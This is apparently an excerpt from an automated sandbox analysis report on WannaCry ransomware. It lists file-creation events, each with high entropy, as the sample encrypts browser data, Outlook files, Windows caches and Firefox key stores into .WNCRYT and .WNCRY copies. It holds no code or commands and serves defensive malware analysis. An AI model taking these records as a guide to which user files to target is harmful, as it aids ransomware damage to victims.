              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.WNCRYT entropy: 7.99978173165Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.WNCRYT entropy: 7.99947247013Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js.WNCRYT entropy: 7.999665421Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js.WNCRYT entropy: 7.99945924919Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js.WNCRYT entropy: 7.99962405057Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.WNCRYT entropy: 7.99985609024Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cert9.db.WNCRYT entropy: 7.99925338246Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\key4.db.WNCRYT entropy: 7.99934431331Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRYT entropy: 7.99830908732Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRYT entropy: 7.99232234311Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRYT entropy: 7.99344735166Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db.WNCRYT entropy: 7.99216786916Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRYT entropy: 7.99029985807Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{0F504D63-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRYT entropy: 7.99946936059Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.WNCRYT entropy: 7.99844297585Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db.WNCRYT entropy: 7.99807296027Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRYT entropy: 7.99984409515Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRYT entropy: 7.99994586397Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst.WNCRYT entropy: 7.99928826259Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRYT entropy: 7.99992276638Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst entropy: 7.99932285811Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRYT entropy: 7.9999175225Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRYT entropy: 7.99709204301Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRYT entropy: 7.99981831829Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT entropy: 7.9998268972Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT entropy: 7.99984567629Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRYT entropy: 7.99984252764Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT entropy: 7.99995861671Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT entropy: 7.9946792705Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\96LGQ1XY\oneDs_f2e0f4a029670f10d892[1].js.WNCRYT entropy: 7.99910031659Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GO30WR0E\ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2[1].js.WNCRYT entropy: 7.99960802813Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NB937L4Q\ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOqiqEgQ2[1].js.WNCRYT entropy: 7.99433722605Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRYT entropy: 7.99981528995Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRYT entropy: 7.99983614804Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db.WNCRYT entropy: 7.99627898208Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRYT entropy: 7.99350688259Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png.WNCRYT entropy: 7.99008003938Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\1MHJ0V8H\pwa-bootstrap-5e7af218e953d095fabf[1].js.WNCRYT entropy: 7.99778880267Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\1MHJ0V8H\pwa-bundle-3a99f64809c6780df035[1].js.WNCRYT entropy: 7.99986040046Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\1SILG4EA\otel-logger-104bffe9378b8041455c[1].js.WNCRYT entropy: 7.99808331347Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png.WNCRYT entropy: 7.99115210426Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\1SILG4EA\pwa-forms-group~mru~officeforms-group-forms~officeforms-my-forms~places.bcdc404c7fe22f14ccad.chunk.v7[1].js.WNCRYT entropy: 7.99566898059Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\1SILG4EA\pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7[1].js.WNCRYT entropy: 7.99536853058Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\1SILG4EA\pwa-vendor-bundle-ba2888a24179bf152f3d[1].js.WNCRYT entropy: 7.99973074517Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\1SILG4EA\pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7[1].js.WNCRYT entropy: 7.99166155463Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\1SILG4EA\sharedscripts-939520eada[1].js.WNCRYT entropy: 7.99664912454Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\5HU7WKQ3\pwa-mru.2ce72562ad7c0ae7059c.chunk.v7[1].js.WNCRYT entropy: 7.99560382737Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\DIYKGEYO\microsoft-365-logo-01d5ecd01a[1].png.WNCRYT entropy: 7.99229793401Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.99988221311Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.99986479978Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\1Sd5265G8OlnRColAI8O_SxSQ1Q.br[1].js.WNCRYT entropy: 7.99852740324Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\1_gc11zDuaJOyBP7gyptBGdPRf4.br[1].js.WNCRYT entropy: 7.99672025624Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js.WNCRYT entropy: 7.9960897084Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\6hU_LneafI_NFLeDvM367ebFaKQ[1].js.WNCRYT entropy: 7.99294532494Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\6qhc82nhlRe74lC1CBjrzThsaXw.br[1].js.WNCRYT entropy: 7.99565098819Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\Desktop\WannaCry.bin.zip.WNCRYT entropy: 7.99995189113Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\Desktop\WannaCry.bin.zip entropy: 7.99939462751Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\Desktop\s.wnry entropy: 7.998263053Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\Desktop\t.wnry entropy: 7.99727613788Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt.WNCRYT entropy: 7.99790445448Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db.WNCRYT entropy: 7.99555726501Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db.WNCRYT entropy: 7.99147406338Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js.WNCRYT entropy: 7.99765602559Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\DIYKGEYO\hero-image-desktop-f6720a4145[1].jpg.WNCRYT entropy: 7.99837743965Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{85c25073-fac4-499b-b8b8-74bec066303c}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99546990903Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{a5e39447-b6a3-49d2-bea7-436a496a2204}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99541190456Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{e4fc45bb-0848-413b-88ce-70c789eb040f}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99505730434Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{b6e2d5d0-7cd6-4302-b3d8-f8809d966acd}\appsconversions.txt.WNCRYT entropy: 7.99987543829Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{b6e2d5d0-7cd6-4302-b3d8-f8809d966acd}\appsglobals.txt.WNCRYT entropy: 7.99944423494Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{b6e2d5d0-7cd6-4302-b3d8-f8809d966acd}\appssynonyms.txt.WNCRYT entropy: 7.99941328462Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{b6e2d5d0-7cd6-4302-b3d8-f8809d966acd}\settingsconversions.txt.WNCRYT entropy: 7.9996740119Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{b6e2d5d0-7cd6-4302-b3d8-f8809d966acd}\settingsglobals.txt.WNCRYT entropy: 7.99604416303Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{b6e2d5d0-7cd6-4302-b3d8-f8809d966acd}\settingssynonyms.txt.WNCRYT entropy: 7.99831474592Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{2f653c34-93d5-49fe-923d-7a89486b82d4}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99920590954Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{3c1df65b-e1b4-4534-b489-7dfc2f9d79b4}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99914562053Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133517910591508756.txt.WNCRYT entropy: 7.99820427866Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133517910684731081.txt.WNCRYT entropy: 7.9983898575Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133724977409828784.txt.WNCRYT entropy: 7.99853138043Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133724977709856709.txt.WNCRYT entropy: 7.99814927079Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRYT entropy: 7.99972687594Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\Desktop\WannaCry.bin.zip.WNCRY (copy) entropy: 7.99995189113Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst.WNCRY (copy) entropy: 7.99928826259Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt.WNCRY (copy) entropy: 7.99790445448Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\DIYKGEYO\hero-image-desktop-f6720a4145[1].jpg.WNCRY (copy) entropy: 7.99837743965Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{85c25073-fac4-499b-b8b8-74bec066303c}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99546990903Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{a5e39447-b6a3-49d2-bea7-436a496a2204}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99541190456Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{e4fc45bb-0848-413b-88ce-70c789eb040f}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99505730434Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{b6e2d5d0-7cd6-4302-b3d8-f8809d966acd}\appsconversions.txt.WNCRY (copy) entropy: 7.99987543829Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{b6e2d5d0-7cd6-4302-b3d8-f8809d966acd}\appsglobals.txt.WNCRY (copy) entropy: 7.99944423494Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{b6e2d5d0-7cd6-4302-b3d8-f8809d966acd}\appssynonyms.txt.WNCRY (copy) entropy: 7.99941328462Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{b6e2d5d0-7cd6-4302-b3d8-f8809d966acd}\settingsconversions.txt.WNCRY (copy) entropy: 7.9996740119Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{b6e2d5d0-7cd6-4302-b3d8-f8809d966acd}\settingsglobals.txt.WNCRY (copy) entropy: 7.99604416303Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{b6e2d5d0-7cd6-4302-b3d8-f8809d966acd}\settingssynonyms.txt.WNCRY (copy) entropy: 7.99831474592Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{2f653c34-93d5-49fe-923d-7a89486b82d4}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99920590954Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{3c1df65b-e1b4-4534-b489-7dfc2f9d79b4}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99914562053Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133517910591508756.txt.WNCRY (copy) entropy: 7.99820427866Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133517910684731081.txt.WNCRY (copy) entropy: 7.9983898575Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133724977409828784.txt.WNCRY (copy) entropy: 7.99853138043Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133724977709856709.txt.WNCRY (copy) entropy: 7.99814927079Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRY (copy) entropy: 7.99972687594Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRY (copy) entropy: 7.99983614804Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db.WNCRY (copy) entropy: 7.99627898208Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRY (copy) entropy: 7.99350688259Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png.WNCRY (copy) entropy: 7.99008003938Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png.WNCRY (copy) entropy: 7.99115210426Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db.WNCRY (copy) entropy: 7.99555726501Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db.WNCRY (copy) entropy: 7.99147406338Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js.WNCRY (copy) entropy: 7.99765602559Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\auto_open_controller.js.WNCRY (copy) entropy: 7.99985055088Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_checkout_page_validator.js.WNCRY (copy) entropy: 7.99981592682Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_confirmation_page_validator.js.WNCRY (copy) entropy: 7.99981704652Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js.WNCRY (copy) entropy: 7.99989065799Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js.WNCRY (copy) entropy: 7.99770282325Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js.WNCRY (copy) entropy: 7.99982358503Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js.WNCRY (copy) entropy: 7.99996805056Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js.WNCRY (copy) entropy: 7.99946063954Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\edge_driver.js.WNCRY (copy) entropy: 7.9999114694Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js.WNCRY (copy) entropy: 7.99318256794Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js.WNCRY (copy) entropy: 7.99988202239Jump to dropped file
